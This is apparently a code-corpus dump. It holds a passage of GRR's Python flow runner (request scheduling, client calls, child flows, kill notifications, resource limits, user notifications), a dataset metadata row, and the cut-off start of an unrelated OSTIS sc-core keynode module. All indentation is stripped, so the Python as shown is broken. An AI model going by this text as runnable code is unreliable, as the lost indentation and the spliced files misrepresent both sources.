return rdfvalue.SessionID(base=base, queue=self.runner_args.queue)
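  # Illustrative result (client id is hypothetical): with client_id
  # C.1000000000000000 and the default queue this yields something like
  #   aff4:/C.1000000000000000/flows/<queue>:<random hex>
  # Callers may choose the base path via base_session_id but not the random
  # suffix, so they cannot force a clash with an existing flow.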
def OutstandingRequests(self):
"""Returns the number of all outstanding requests.
This is used to determine if the flow needs to be destroyed yet.
Returns:
the number of all outstanding requests.
"""
return self.context.outstanding_requests
def CallState(self,
messages=None,
next_state="",
request_data=None,
start_time=None):
"""This method is used to schedule a new state on a different worker.
This is basically the same as CallFlow() except we are calling
ourselves. The state will be invoked in a later time and receive all the
messages we send.
Args:
messages: A list of rdfvalues to send. If the last one is not a
GrrStatus, we append an OK Status.
next_state: The state in this flow to be invoked with the responses.
request_data: Any dict provided here will be available in the
RequestState protobuf. The Responses object maintains a reference
to this protobuf for use in the execution of the state method. (so
you can access this data by responses.request).
start_time: Start the flow at this time. This Delays notification for
flow processing into the future. Note that the flow may still be
processed earlier if there are client responses waiting.
Raises:
FlowRunnerError: if the next state is not valid.
"""
if messages is None:
messages = []
# Check if the state is valid
if not getattr(self.flow_obj, next_state):
raise FlowRunnerError("Next state %s is invalid.")
# Queue the response message to the parent flow
request_state = rdf_flows.RequestState(
id=self.GetNextOutboundId(),
session_id=self.context.session_id,
client_id=self.runner_args.client_id,
next_state=next_state)
if request_data:
request_state.data = rdf_protodict.Dict().FromDict(request_data)
self.QueueRequest(request_state, timestamp=start_time)
# Add the status message if needed.
if not messages or not isinstance(messages[-1], rdf_flows.GrrStatus):
messages.append(rdf_flows.GrrStatus())
# Send all the messages
for i, payload in enumerate(messages):
if isinstance(payload, rdfvalue.RDFValue):
msg = rdf_flows.GrrMessage(
session_id=self.session_id,
request_id=request_state.id,
response_id=1 + i,
auth_state=rdf_flows.GrrMessage.AuthorizationState.AUTHENTICATED,
payload=payload,
type=rdf_flows.GrrMessage.Type.MESSAGE)
if isinstance(payload, rdf_flows.GrrStatus):
msg.type = rdf_flows.GrrMessage.Type.STATUS
else:
raise FlowRunnerError("Bad message %s of type %s." % (payload,
type(payload)))
self.QueueResponse(msg, start_time)
# Notify the worker about it.
self.QueueNotification(session_id=self.session_id, timestamp=start_time)
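  # Typical usage sketch from a flow's state method (state name and payload are
  # hypothetical); the flow object delegates this call to its runner:
  #
  #   self.CallState(messages=[rdf_client.StatEntry()],
  #                  next_state="ProcessStats",
  #                  start_time=rdfvalue.RDFDatetime.Now() + rdfvalue.Duration("1h"))
  #
  # The responses arrive in ProcessStats(); an OK GrrStatus is appended
  # automatically if the last message is not already a status.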
def ScheduleKillNotification(self):
"""Schedules a kill notification for this flow."""
# Create a notification for the flow in the future that
    # indicates that this flow is in progress. We'll delete this
# notification when we're done with processing completed
# requests. If we're stuck for some reason, the notification
# will be delivered later and the stuck flow will get
# terminated.
stuck_flows_timeout = rdfvalue.Duration(config_lib.CONFIG[
"Worker.stuck_flows_timeout"])
kill_timestamp = (rdfvalue.RDFDatetime().Now() + stuck_flows_timeout)
with queue_manager.QueueManager(token=self.token) as manager:
manager.QueueNotification(
session_id=self.session_id,
in_progress=True,
timestamp=kill_timestamp)
# kill_timestamp may get updated via flow.HeartBeat() calls, so we
# have to store it in the context.
self.context.kill_timestamp = kill_timestamp
def HeartBeat(self):
# If kill timestamp is set (i.e. if the flow is currently being
# processed by the worker), delete the old "kill if stuck" notification
# and schedule a new one, further in the future.
if self.context.kill_timestamp:
with queue_manager.QueueManager(token=self.token) as manager:
manager.DeleteNotification(
self.session_id,
start=self.context.kill_timestamp,
end=self.context.kill_timestamp + rdfvalue.Duration("1s"))
stuck_flows_timeout = rdfvalue.Duration(config_lib.CONFIG[
"Worker.stuck_flows_timeout"])
self.context.kill_timestamp = (
rdfvalue.RDFDatetime().Now() + stuck_flows_timeout)
manager.QueueNotification(
session_id=self.session_id,
in_progress=True,
timestamp=self.context.kill_timestamp)
def FinalizeProcessCompletedRequests(self, notification):
# Delete kill notification as the flow got processed and is not
# stuck.
with queue_manager.QueueManager(token=self.token) as manager:
manager.DeleteNotification(
self.session_id,
start=self.context.kill_timestamp,
end=self.context.kill_timestamp)
self.context.kill_timestamp = None
# If a flow raises in one state, the remaining states will not
# be processed. This is indistinguishable from an incomplete
# state due to missing responses / status so we need to check
# here if the flow is still running before rescheduling.
if (self.IsRunning() and notification.last_status and
(self.context.next_processed_request <= notification.last_status)):
logging.debug("Had to reschedule a notification: %s", notification)
# We have received a notification for a specific request but
# could not process that request. This might be a race
# condition in the data store so we reschedule the
# notification in the future.
delay = config_lib.CONFIG["Worker.notification_retry_interval"]
notification.ttl -= 1
if notification.ttl:
manager.QueueNotification(
notification, timestamp=notification.timestamp + delay)
def ProcessCompletedRequests(self, notification, unused_thread_pool=None):
"""Go through the list of requests and process the completed ones.
We take a snapshot in time of all requests and responses for this flow. We
then process as many completed requests as possible. If responses are not
quite here we leave it for next time.
It is safe to call this function as many times as needed. NOTE: We assume
that the flow queue is locked so another worker is not processing these
messages while we are. It is safe to insert new messages to the flow:state
queue.
Args:
notification: The notification object that triggered this processing.
"""
self.ScheduleKillNotification()
try:
self._ProcessCompletedRequests(notification)
finally:
self.FinalizeProcessCompletedRequests(notification)
def _ProcessCompletedRequests(self, notification):
"""Does the actual processing of the completed requests."""
# First ensure that client messages are all removed. NOTE: We make a new
# queue manager here because we want only the client messages to be removed
# ASAP. This must happen before we actually run the flow to ensure the
# client requests are removed from the client queues.
with queue_manager.QueueManager(token=self.token) as manager:
for request, _ in manager.FetchCompletedRequests(
self.session_id, timestamp=(0, notification.timestamp)):
# Requests which are not destined to clients have no embedded request
# message.
if request.HasField("request"):
manager.DeQueueClientRequest(request.client_id,
request.request.task_id)
# The flow is dead - remove all outstanding requests and responses.
if not self.IsRunning():
self.queue_manager.DestroyFlowStates(self.session_id)
return
processing = []
while True:
try:
# Here we only care about completed requests - i.e. those requests with
# responses followed by a status message.
for request, responses in self.queue_manager.FetchCompletedResponses(
self.session_id, timestamp=(0, notification.timestamp)):
if request.id == 0:
continue
if not responses:
break
          # We are missing a needed request - maybe it's not completed yet.
if request.id > self.context.next_processed_request:
stats.STATS.IncrementCounter("grr_response_out_of_order")
break
# Not the request we are looking for - we have seen it before
# already.
if request.id < self.context.next_processed_request:
self.queue_manager.DeleteFlowRequestStates(self.session_id, request)
continue
if not responses:
continue
# Do we have all the responses here? This can happen if some of the
# responses were lost.
if len(responses) != responses[-1].response_id:
# If we can retransmit do so. Note, this is different from the
# automatic retransmission facilitated by the task scheduler (the
# Task.task_ttl field) which would happen regardless of these.
if request.transmission_count < 5:
stats.STATS.IncrementCounter("grr_request_retransmission_count")
request.transmission_count += 1
self.ReQueueRequest(request)
break
# If we get here its all good - run the flow.
if self.IsRunning():
self.flow_obj.HeartBeat()
self.RunStateMethod(request.next_state, request, responses)
# Quit early if we are no longer alive.
else:
break
# At this point we have processed this request - we can remove it and
# its responses from the queue.
self.queue_manager.DeleteFlowRequestStates(self.session_id, request)
self.context.next_processed_request += 1
self.DecrementOutstandingRequests()
# Are there any more outstanding requests?
if not self.OutstandingRequests():
# Allow the flow to cleanup
if self.IsRunning() and self.context.current_state != "End":
self.RunStateMethod("End")
# Rechecking the OutstandingRequests allows the End state (which was
# called above) to issue further client requests - hence postpone
# termination.
if not self.OutstandingRequests():
# TODO(user): Deprecate in favor of 'flow_completions' metric.
stats.STATS.IncrementCounter("grr_flow_completed_count")
stats.STATS.IncrementCounter(
"flow_completions", fields=[self.flow_obj.Name()])
logging.debug("Destroying session %s(%s) for client %s",
self.session_id,
self.flow_obj.Name(), self.runner_args.client_id)
self.flow_obj.Terminate()
# We are done here.
return
except queue_manager.MoreDataException:
# Join any threads.
for event in processing:
event.wait()
# We did not read all the requests/responses in this run in order to
# keep a low memory footprint and have to make another pass.
self.FlushMessages()
self.flow_obj.Flush()
continue
finally:
# Join any threads.
for event in processing:
event.wait()
def RunStateMethod(self,
method,
request=None,
responses=None,
event=None,
direct_response=None):
"""Completes the request by calling the state method.
NOTE - we expect the state method to be suitably decorated with a
StateHandler (otherwise this will raise because the prototypes
are different)
Args:
method: The name of the state method to call.
request: A RequestState protobuf.
responses: A list of GrrMessages responding to the request.
event: A threading.Event() instance to signal completion of this request.
direct_response: A flow.Responses() object can be provided to avoid
creation of one.
"""
client_id = None
try:
self.context.current_state = method
if request and responses:
client_id = request.client_id or self.runner_args.client_id
logging.debug("%s Running %s with %d responses from %s",
self.session_id, method, len(responses), client_id)
else:
logging.debug("%s Running state method %s", self.session_id, method)
# Extend our lease if needed.
self.flow_obj.HeartBeat()
try:
method = getattr(self.flow_obj, method)
except AttributeError:
raise FlowRunnerError("Flow %s has no state method %s" %
(self.flow_obj.__class__.__name__, method))
method(
direct_response=direct_response, request=request, responses=responses)
if self.sent_replies:
self.ProcessRepliesWithOutputPlugins(self.sent_replies)
self.sent_replies = []
# We don't know here what exceptions can be thrown in the flow but we have
# to continue. Thus, we catch everything.
except Exception as e: # pylint: disable=broad-except
# This flow will terminate now
# TODO(user): Deprecate in favor of 'flow_errors'.
stats.STATS.IncrementCounter("grr_flow_errors")
stats.STATS.IncrementCounter("flow_errors", fields=[self.flow_obj.Name()])
logging.exception("Flow %s raised %s.", self.session_id, e)
self.Error(traceback.format_exc(), client_id=client_id)
finally:
if event:
event.set()
def GetNextOutboundId(self):
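    # Hand out outbound request ids under a lock so concurrent callers never
    # receive the same id.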
with self.outbound_lock:
my_id = self.context.next_outbound_id
self.context.next_outbound_id += 1
return my_id
def CallClient(self,
action_cls,
request=None,
next_state=None,
client_id=None,
request_data=None,
start_time=None,
**kwargs):
"""Calls the client asynchronously.
This sends a message to the client to invoke an Action. The run
action may send back many responses. These will be queued by the
framework until a status message is sent by the client. The status
message will cause the entire transaction to be committed to the
specified state.
Args:
action_cls: The function to call on the client.
request: The request to send to the client. If not specified (Or None) we
create a new RDFValue using the kwargs.
next_state: The state in this flow, that responses to this
message should go to.
client_id: rdf_client.ClientURN to send the request to.
request_data: A dict which will be available in the RequestState
protobuf. The Responses object maintains a reference to this
protobuf for use in the execution of the state method. (so you can
access this data by responses.request). Valid values are
strings, unicode and protobufs.
      start_time: Call the client at this time. This delays the client request
        into the future.
**kwargs: These args will be used to construct the client action semantic
protobuf.
Raises:
FlowRunnerError: If next_state is not one of the allowed next states.
RuntimeError: The request passed to the client does not have the correct
type.
"""
if client_id is None:
client_id = self.runner_args.client_id
if client_id is None:
raise FlowRunnerError("CallClient() is used on a flow which was not "
"started with a client.")
if not isinstance(client_id, rdf_client.ClientURN):
# Try turning it into a ClientURN
client_id = rdf_client.ClientURN(client_id)
if action_cls.in_rdfvalue is None:
if request:
raise RuntimeError("Client action %s does not expect args." %
action_cls.__name__)
else:
if request is None:
# Create a new rdf request.
request = action_cls.in_rdfvalue(**kwargs)
else:
# Verify that the request type matches the client action requirements.
if not isinstance(request, action_cls.in_rdfvalue):
raise RuntimeError("Client action expected %s but got %s" %
(action_cls.in_rdfvalue, type(request)))
outbound_id = self.GetNextOutboundId()
# Create a new request state
state = rdf_flows.RequestState(
id=outbound_id,
session_id=self.session_id,
next_state=next_state,
client_id=client_id)
if request_data is not None:
state.data = rdf_protodict.Dict(request_data)
# Send the message with the request state
msg = rdf_flows.GrrMessage(
session_id=utils.SmartUnicode(self.session_id),
name=action_cls.__name__,
request_id=outbound_id,
priority=self.runner_args.priority,
require_fastpoll=self.runner_args.require_fastpoll,
queue=client_id.Queue(),
payload=request,
generate_task_id=True)
if self.context.remaining_cpu_quota:
msg.cpu_limit = int(self.context.remaining_cpu_quota)
cpu_usage = self.context.client_resources.cpu_usage
if self.runner_args.cpu_limit:
msg.cpu_limit = max(self.runner_args.cpu_limit - cpu_usage.user_cpu_time -
cpu_usage.system_cpu_time, 0)
if msg.cpu_limit == 0:
raise FlowRunnerError("CPU limit exceeded.")
if self.runner_args.network_bytes_limit:
msg.network_bytes_limit = max(self.runner_args.network_bytes_limit -
self.context.network_bytes_sent, 0)
if msg.network_bytes_limit == 0:
raise FlowRunnerError("Network limit exceeded.")
state.request = msg
self.QueueRequest(state, timestamp=start_time)
def Publish(self, event_name, msg, delay=0):
"""Sends the message to event listeners."""
events.Events.PublishEvent(event_name, msg, delay=delay, token=self.token)
def CallFlow(self,
flow_name=None,
next_state=None,
sync=True,
request_data=None,
client_id=None,
base_session_id=None,
**kwargs):
"""Creates a new flow and send its responses to a state.
This creates a new flow. The flow may send back many responses which will be
queued by the framework until the flow terminates. The final status message
will cause the entire transaction to be committed to the specified state.
Args:
flow_name: The name of the flow to invoke.
next_state: The state in this flow, that responses to this
message should go to.
sync: If True start the flow inline on the calling thread, else schedule
a worker to actually start the child flow.
request_data: Any dict provided here will be available in the
RequestState protobuf. The Responses object maintains a reference
to this protobuf for use in the execution of the state method. (so
you can access this data by responses.request). There is no
format mandated on this data but it may be a serialized protobuf.
client_id: If given, the flow is started for this client.
      base_session_id: A URN which will be used as the base for the child
        flow's session id.
**kwargs: Arguments for the child flow.
Raises:
FlowRunnerError: If next_state is not one of the allowed next states.
Returns:
The URN of the child flow which was created.
"""
client_id = client_id or self.runner_args.client_id
# This looks very much like CallClient() above - we prepare a request state,
# and add it to our queue - any responses from the child flow will return to
# the request state and the stated next_state. Note however, that there is
# no client_id or actual request message here because we directly invoke the
# child flow rather than queue anything for it.
state = rdf_flows.RequestState(
id=self.GetNextOutboundId(),
session_id=utils.SmartUnicode(self.session_id),
client_id=client_id,
next_state=next_state,
response_count=0)
if request_data:
state.data = rdf_protodict.Dict().FromDict(request_data)
# If the urn is passed explicitly (e.g. from the hunt runner) use that,
# otherwise use the urn from the flow_runner args. If both are None, create
# a new collection and give the urn to the flow object.
logs_urn = self._GetLogsCollectionURN(
kwargs.pop("logs_collection_urn", None) or
self.runner_args.logs_collection_urn)
# If we were called with write_intermediate_results, propagate down to
# child flows. This allows write_intermediate_results to be set to True
# either at the top level parent, or somewhere in the middle of
# the call chain.
write_intermediate = (kwargs.pop("write_intermediate_results", False) or
self.runner_args.write_intermediate_results)
try:
event_id = self.runner_args.event_id
except AttributeError:
event_id = None
# Create the new child flow but do not notify the user about it.
child_urn = self.flow_obj.StartFlow(
client_id=client_id,
flow_name=flow_name,
base_session_id=base_session_id or self.session_id,
event_id=event_id,
request_state=state,
token=self.token,
notify_to_user=False,
parent_flow=self.flow_obj,
sync=sync,
queue=self.runner_args.queue,
write_intermediate_results=write_intermediate,
logs_collection_urn=logs_urn,
**kwargs)
self.QueueRequest(state)
return child_urn
def SendReply(self, response):
"""Allows this flow to send a message to its parent flow.
If this flow does not have a parent, the message is ignored.
Args:
response: An RDFValue() instance to be sent to the parent.
Raises:
RuntimeError: If responses is not of the correct type.
"""
if not isinstance(response, rdfvalue.RDFValue):
raise RuntimeError("SendReply can only send a Semantic Value")
# Only send the reply if we have a parent and if flow's send_replies
# attribute is True. We have a parent only if we know our parent's request.
if (self.runner_args.request_state.session_id and
self.runner_args.send_replies):
request_state = self.runner_args.request_state
request_state.response_count += 1
# Make a response message
msg = rdf_flows.GrrMessage(
session_id=request_state.session_id,
request_id=request_state.id,
response_id=request_state.response_count,
auth_state=rdf_flows.GrrMessage.AuthorizationState.AUTHENTICATED,
type=rdf_flows.GrrMessage.Type.MESSAGE,
payload=response,
args_rdf_name=response.__class__.__name__,
args_age=int(response.age))
# Queue the response now
self.queue_manager.QueueResponse(request_state.session_id, msg)
if self.runner_args.write_intermediate_results:
self.QueueReplyForResultsCollection(response)
else:
# Only write the reply to the collection if we are the parent flow.
self.QueueReplyForResultsCollection(response)
def FlushMessages(self):
"""Flushes the messages that were queued."""
# Only flush queues if we are the top level runner.
if self.parent_runner is None:
self.queue_manager.Flush()
if self.queued_replies:
with data_store.DB.GetMutationPool(token=self.token) as mutation_pool:
for response in self.queued_replies:
sequential_collection.GeneralIndexedCollection.StaticAdd(
self.output_urn,
self.token,
response,
mutation_pool=mutation_pool)
multi_type_collection.MultiTypeCollection.StaticAdd(
self.multi_type_output_urn,
self.token,
response,
mutation_pool=mutation_pool)
self.queued_replies = []
def Error(self, backtrace, client_id=None, status=None):
"""Kills this flow with an error."""
client_id = client_id or self.runner_args.client_id
if self.IsRunning():
# Set an error status
reply = rdf_flows.GrrStatus()
if status is None:
reply.status = rdf_flows.GrrStatus.ReturnedStatus.GENERIC_ERROR
else:
reply.status = status
if backtrace:
reply.error_message = backtrace
self.flow_obj.Terminate(status=reply)
self.context.state = rdf_flows.FlowContext.State.ERROR
if backtrace:
logging.error("Error in flow %s (%s). Trace: %s", self.session_id,
client_id, backtrace)
self.context.backtrace = backtrace
else:
logging.error("Error in flow %s (%s).", self.session_id, client_id)
self.Notify("FlowStatus", client_id,
"Flow (%s) terminated due to error" % self.session_id)
def GetState(self):
return self.context.state
def IsRunning(self):
return self.context.state == rdf_flows.FlowContext.State.RUNNING
def ProcessRepliesWithOutputPlugins(self, replies):
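    # Run every configured output plugin over the replies, recording a success
    # or error entry in that plugin's persistent state.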
if not self.runner_args.output_plugins or not replies:
return
for output_plugin_state in self.context.output_plugins_states:
plugin_descriptor = output_plugin_state.plugin_descriptor
plugin_state = output_plugin_state.plugin_state
output_plugin = plugin_descriptor.GetPluginForState(plugin_state)
# Extend our lease if needed.
self.flow_obj.HeartBeat()
try:
output_plugin.ProcessResponses(replies)
output_plugin.Flush()
log_item = output_plugin_lib.OutputPluginBatchProcessingStatus(
plugin_descriptor=plugin_descriptor,
status="SUCCESS",
batch_size=len(replies))
# Cannot append to lists in AttributedDicts.
plugin_state["logs"] += [log_item]
self.Log("Plugin %s sucessfully processed %d flow replies.",
plugin_descriptor, len(replies))
except Exception as e: # pylint: disable=broad-except
error = output_plugin_lib.OutputPluginBatchProcessingStatus(
plugin_descriptor=plugin_descriptor,
status="ERROR",
summary=utils.SmartStr(e),
batch_size=len(replies))
# Cannot append to lists in AttributedDicts.
plugin_state["errors"] += [error]
self.Log("Plugin %s failed to process %d replies due to: %s",
plugin_descriptor, len(replies), e)
def Terminate(self, status=None):
"""Terminates this flow."""
try:
self.queue_manager.DestroyFlowStates(self.session_id)
except queue_manager.MoreDataException:
pass
# This flow might already not be running.
if self.context.state != rdf_flows.FlowContext.State.RUNNING:
return
if self.runner_args.request_state.session_id:
# Make a response or use the existing one.
response = status or rdf_flows.GrrStatus()
client_resources = self.context.client_resources
user_cpu = client_resources.cpu_usage.user_cpu_time
sys_cpu = client_resources.cpu_usage.system_cpu_time
response.cpu_time_used.user_cpu_time = user_cpu
response.cpu_time_used.system_cpu_time = sys_cpu
response.network_bytes_sent = self.context.network_bytes_sent
response.child_session_id = self.session_id
request_state = self.runner_args.request_state
request_state.response_count += 1
# Make a response message
msg = rdf_flows.GrrMessage(
session_id=request_state.session_id,
request_id=request_state.id,
response_id=request_state.response_count,
auth_state=rdf_flows.GrrMessage.AuthorizationState.AUTHENTICATED,
type=rdf_flows.GrrMessage.Type.STATUS,
payload=response)
try:
# Queue the response now
self.queue_manager.QueueResponse(request_state.session_id, msg)
finally:
self.QueueNotification(session_id=request_state.session_id)
# Mark as terminated.
self.context.state = rdf_flows.FlowContext.State.TERMINATED
self.flow_obj.Flush()
def UpdateProtoResources(self, status):
"""Save cpu and network stats, check limits."""
user_cpu = status.cpu_time_used.user_cpu_time
system_cpu = status.cpu_time_used.system_cpu_time
self.context.client_resources.cpu_usage.user_cpu_time += user_cpu
self.context.client_resources.cpu_usage.system_cpu_time += system_cpu
user_cpu_total = self.context.client_resources.cpu_usage.user_cpu_time
system_cpu_total = self.context.client_resources.cpu_usage.system_cpu_time
self.context.network_bytes_sent += status.network_bytes_sent
if self.runner_args.cpu_limit:
if self.runner_args.cpu_limit < (user_cpu_total + system_cpu_total):
# We have exceeded our limit, stop this flow.
raise FlowRunnerError("CPU limit exceeded.")
if self.runner_args.network_bytes_limit:
if (self.runner_args.network_bytes_limit <
self.context.network_bytes_sent):
# We have exceeded our byte limit, stop this flow.
raise FlowRunnerError("Network bytes limit exceeded.")
def SaveResourceUsage(self, request, responses):
"""Method automatically called from the StateHandler to tally resource."""
_ = request
status = responses.status
if status:
# Do this last since it may raise "CPU limit exceeded".
self.UpdateProtoResources(status)
def _QueueRequest(self, request, timestamp=None):
if request.HasField("request") and request.request.name:
# This message contains a client request as well.
self.queue_manager.QueueClientMessage(
request.request, timestamp=timestamp)
self.queue_manager.QueueRequest(
self.session_id, request, timestamp=timestamp)
def IncrementOutstandingRequests(self):
with self.outbound_lock:
self.context.outstanding_requests += 1
def DecrementOutstandingRequests(self):
with self.outbound_lock:
self.context.outstanding_requests -= 1
def QueueRequest(self, request, timestamp=None):
# Remember the new request for later
self._QueueRequest(request, timestamp=timestamp)
self.IncrementOutstandingRequests()
def ReQueueRequest(self, request, timestamp=None):
self._QueueRequest(request, timestamp=timestamp)
def QueueResponse(self, response, timestamp=None):
self.queue_manager.QueueResponse(
self.session_id, response, timestamp=timestamp)
def QueueNotification(self, *args, **kw):
self.queue_manager.QueueNotification(*args, **kw)
def QueueReplyForResultsCollection(self, response):
self.queued_replies.append(response)
if self.runner_args.client_id:
# While wrapping the response in GrrMessage is not strictly necessary for
# output plugins, GrrMessage.source may be used by these plugins to fetch
# client's metadata and include it into the exported data.
self.sent_replies.append(
rdf_flows.GrrMessage(
payload=response, source=self.runner_args.client_id))
else:
self.sent_replies.append(response)
def SetStatus(self, status):
self.context.status = status
def Log(self, format_str, *args):
"""Logs the message using the flow's standard logging.
Args:
format_str: Format string
*args: arguments to the format string
Raises:
RuntimeError: on parent missing logs_collection
"""
format_str = utils.SmartUnicode(format_str)
status = format_str
if args:
try:
# The status message is always in unicode
status = format_str % args
except TypeError:
logging.error("Tried to log a format string with the wrong number "
"of arguments: %s", format_str)
logging.info("%s: %s", self.session_id, status)
self.SetStatus(utils.SmartUnicode(status))
log_entry = rdf_flows.FlowLog(
client_id=self.runner_args.client_id,
urn=self.session_id,
flow_name=self.flow_obj.__class__.__name__,
log_message=status)
logs_collection_urn = self._GetLogsCollectionURN(
self.runner_args.logs_collection_urn)
FlowLogCollection.StaticAdd(logs_collection_urn, self.token, log_entry)
def GetLog(self):
return self.OpenLogsCollection(
self.runner_args.logs_collection_urn, mode="r")
def Status(self, format_str, *args):
"""Flows can call this method to set a status message visible to users."""
self.Log(format_str, *args)
def Notify(self, message_type, subject, msg):
"""Send a notification to the originating user.
Args:
message_type: The type of the message. This allows the UI to format
a link to the original object e.g. "ViewObject" or "HostInformation"
subject: The urn of the AFF4 object of interest in this link.
msg: A free form textual message.
"""
user = self.context.creator
# Don't send notifications to system users.
if (self.runner_args.notify_to_user and
user not in aff4_users.GRRUser.SYSTEM_USERS):
# Prefix the message with the hostname of the client we are running
# against.
if self.runner_args.client_id:
client_fd = aff4.FACTORY.Open(
self.runner_args.client_id, mode="rw", token=self.token)
hostname = client_fd.Get(client_fd.Schema.HOSTNAME) or ""
client_msg = "%s: %s" % (hostname, msg)
else:
client_msg = msg
# Add notification to the User object.
fd = aff4.FACTORY.Create(
aff4.ROOT_URN.Add("users").Add(user),
aff4_users.GRRUser,
mode="rw",
token=self.token)
# Queue notifications to the user.
fd.Notify(message_type, subject, client_msg, self.session_id)
fd.Close()
# Add notifications to the flow.
notification = rdf_flows.Notification(
type=message_type,
subject=utils.SmartUnicode(subject),
message=utils.SmartUnicode(msg),
source=self.session_id,
timestamp=rdfvalue.RDFDatetime.Now())
data_store.DB.Set(self.session_id,
self.flow_obj.Schema.NOTIFICATION,
notification,
replace=False,
sync=False,
token=self.token)
# Disable further notifications.
self.context.user_notified = True
# Allow the flow to either specify an event name or an event handler URN.
notification_event = (self.runner_args.notification_event or
self.runner_args.notification_urn)
if notification_event:
if self.context.state == rdf_flows.FlowContext.State.ERROR:
status = rdf_flows.FlowNotification.Status.ERROR
else:
status = rdf_flows.FlowNotification.Status.OK
event = rdf_flows.FlowNotification(
session_id=self.context.session_id,
flow_name=self.runner_args.flow_name,
client_id=self.runner_args.client_id,
status=status)
self.flow_obj.Publish(notification_event, message=event)
| apache-2.0 | -6,703,846,200,527,131,000 | 37.063301 | 80 | 0.667221 | false |
laz2/sc-core | bindings/python/sc_core/nsm.py | 1 | 16628 |
"""
-----------------------------------------------------------------------------
This source file is part of OSTIS (Open Semantic Technology for Intelligent Systems)
For the latest info, see http://www.ostis.net
Copyright (c) 2010 OSTIS
OSTIS is free software: you can redistribute it and/or modify
it under the terms of the GNU Lesser General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
OSTIS is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU Lesser General Public License for more details.
You should have received a copy of the GNU Lesser General Public License
along with OSTIS. If not, see <http://www.gnu.org/licenses/>.
-----------------------------------------------------------------------------
"""
'''
Created on
26.01.11
@author: Zhitko V.A.
'''
import pm
import msession
import time
session = msession.MThreadSession(pm.get_session())
segment = session.open_segment(u"/etc/nsm")
class nsm:
info = "NSM Keynodes"
goals = session.find_keynode_full_uri(u"/proc/agents/nsm/keynode/goals")
attr_confirmed = session.find_keynode_full_uri(u"/proc/agents/nsm/keynode/confirmed_")
attr_active = session.find_keynode_full_uri(u"/proc/agents/nsm/keynode/active_")
attr_confirm_ = session.find_keynode_full_uri(u"/proc/agents/nsm/keynode/confirm_")
attr_search = session.find_keynode_full_uri(u"/proc/agents/nsm/keynode/search_")
attr_searched = session.find_keynode_full_uri(u"/proc/agents/nsm/keynode/searched_")
attr_generate = session.find_keynode_full_uri(u"/proc/agents/nsm/keynode/generate_")
attr_generated = session.find_keynode_full_uri(u"/proc/agents/nsm/keynode/generated_")
result = session.find_keynode_full_uri(u"/proc/agents/nsm/keynode/Result")
nsm_command = session.find_keynode_full_uri(u"/proc/agents/nsm/keynode/nsm_command")
attr_nsm_command = session.find_keynode_full_uri(u"/proc/agents/nsm/keynode/nsm_command_")
attr_nsm_command_pattern = session.find_keynode_full_uri(u"/proc/agents/nsm/keynode/nsm_command_pattern_")
attr_nsm_command_elem = session.find_keynode_full_uri(u"/proc/agents/nsm/keynode/nsm_command_elem_")
attr_nsm_command_comment = session.find_keynode_full_uri(u"/proc/agents/nsm/keynode/nsm_command_comment_")
attr_nsm_command_shortname = session.find_keynode_full_uri(u"/proc/agents/nsm/keynode/nsm_command_shortname_")
n_1 = session.find_keynode_full_uri(u"/proc/keynode/1_")
n_2 = session.find_keynode_full_uri(u"/proc/keynode/2_")
attr = {
0:session.find_keynode_full_uri(u"/proc/keynode/1_"),
1:session.find_keynode_full_uri(u"/proc/keynode/2_"),
2:session.find_keynode_full_uri(u"/proc/keynode/3_"),
3:session.find_keynode_full_uri(u"/proc/keynode/4_"),
4:session.find_keynode_full_uri(u"/proc/keynode/5_"),
5:session.find_keynode_full_uri(u"/proc/keynode/6_"),
6:session.find_keynode_full_uri(u"/proc/keynode/7_"),
7:session.find_keynode_full_uri(u"/proc/keynode/8_"),
8:session.find_keynode_full_uri(u"/proc/keynode/9_"),
9:session.find_keynode_full_uri(u"/proc/keynode/10_")
}
def initNSM(ses):
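    # Re-bind the module-level session, segment and nsm keynodes to the
    # session supplied by the caller (mirrors the class-level lookups above).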
global session
session = ses
global segment
segment = session.open_segment(u"/etc/nsm")
global nsm
nsm.goals = session.find_keynode_full_uri(u"/proc/agents/nsm/keynode/goals")
nsm.attr_confirmed = session.find_keynode_full_uri(u"/proc/agents/nsm/keynode/confirmed_")
nsm.attr_active = session.find_keynode_full_uri(u"/proc/agents/nsm/keynode/active_")
nsm.attr_confirm_ = session.find_keynode_full_uri(u"/proc/agents/nsm/keynode/confirm_")
nsm.attr_search = session.find_keynode_full_uri(u"/proc/agents/nsm/keynode/search_")
nsm.attr_searched = session.find_keynode_full_uri(u"/proc/agents/nsm/keynode/searched_")
nsm.attr_generate = session.find_keynode_full_uri(u"/proc/agents/nsm/keynode/generate_")
nsm.attr_generated = session.find_keynode_full_uri(u"/proc/agents/nsm/keynode/generated_")
nsm.result = session.find_keynode_full_uri(u"/proc/agents/nsm/keynode/Result")
nsm.nsm_command = session.find_keynode_full_uri(u"/proc/agents/nsm/keynode/nsm_command")
nsm.attr_nsm_command = session.find_keynode_full_uri(u"/proc/agents/nsm/keynode/nsm_command_")
nsm.attr_nsm_command_pattern = session.find_keynode_full_uri(u"/proc/agents/nsm/keynode/nsm_command_pattern_")
nsm.attr_nsm_command_elem = session.find_keynode_full_uri(u"/proc/agents/nsm/keynode/nsm_command_elem_")
nsm.attr_nsm_command_comment = session.find_keynode_full_uri(u"/proc/agents/nsm/keynode/nsm_command_comment_")
nsm.attr_nsm_command_shortname = session.find_keynode_full_uri(u"/proc/agents/nsm/keynode/nsm_command_shortname_")
nsm.n_1 = session.find_keynode_full_uri(u"/proc/keynode/1_")
nsm.n_2 = session.find_keynode_full_uri(u"/proc/keynode/2_")
nsm.attr = {
0:session.find_keynode_full_uri(u"/proc/keynode/1_"),
1:session.find_keynode_full_uri(u"/proc/keynode/2_"),
2:session.find_keynode_full_uri(u"/proc/keynode/3_"),
3:session.find_keynode_full_uri(u"/proc/keynode/4_"),
4:session.find_keynode_full_uri(u"/proc/keynode/5_"),
5:session.find_keynode_full_uri(u"/proc/keynode/6_"),
6:session.find_keynode_full_uri(u"/proc/keynode/7_"),
7:session.find_keynode_full_uri(u"/proc/keynode/8_"),
8:session.find_keynode_full_uri(u"/proc/keynode/9_"),
9:session.find_keynode_full_uri(u"/proc/keynode/10_")
}
def madeNewNSMCommand(sc_pattern_set,
command_elem_list = [],
str_command_short_name = "",
str_command_comment = ""):
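    # An NSM command is a sheaf node that bundles the search pattern set, the
    # command element set, a short name and a comment, each attached under its
    # own attribute node.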
